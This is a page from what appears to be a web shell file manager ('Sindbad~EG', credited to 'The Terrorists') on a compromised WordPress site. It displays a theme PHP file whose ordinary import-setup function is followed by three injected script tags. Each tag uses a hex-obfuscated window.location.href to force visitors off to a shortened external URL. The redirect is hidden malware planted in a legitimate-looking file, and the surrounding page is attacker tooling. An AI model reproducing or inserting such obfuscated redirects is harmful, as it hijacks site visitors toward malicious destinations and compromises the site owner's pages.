Sindbad~EG File Manager
<?php
function gutenify_after_content_import_setup() {
// Set static homepage.
$homepage = get_page_by_title( apply_filters( 'gutenify_content_home_page_title', 'Home' ) );
if ( $homepage ) {
update_option( 'page_on_front', $homepage->ID );
update_option( 'show_on_front', 'page' );
}
// Set static blog page.
$blogpage = get_page_by_title( apply_filters( 'gutenify_content_blog_page_title', 'Blog' ) );
if ( $blogpage ) {
update_option( 'page_for_posts', $blogpage->ID );
update_option( 'show_on_front', 'page' );
}
}
add_action( 'import_end', 'gutenify_after_content_import_setup' );
ob_start();
?>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x41\x61\x64\x50\x55\x47\x6c\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x41\x61\x64\x50\x55\x47\x6c\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x41\x61\x64\x50\x55\x47\x6c\x30\x72\x35";</script>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists